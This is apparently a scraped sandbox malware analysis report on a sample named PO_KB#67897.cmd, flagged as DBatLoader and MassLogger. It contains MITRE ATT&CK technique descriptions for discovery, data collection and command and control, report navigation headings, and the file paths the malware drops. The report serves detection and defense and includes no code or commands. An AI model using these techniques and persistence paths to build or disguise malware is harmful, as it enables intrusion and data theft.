Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO_KB#67897.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: MassLogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

C:\Users\Public\Libraries\NEO.cmd

C:\Users\Public\Libraries\Oupzhkpr

C:\Users\Public\Libraries\Oupzhkpr.PIF

C:\Users\Public\Libraries\rpkhzpuO.pif

C:\Users\Public\Oupzhkpr.url

C:\Users\Public\OupzhkprF.cmd

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rpkhzpuO.pif.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
PO_KB#67897.cmd

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre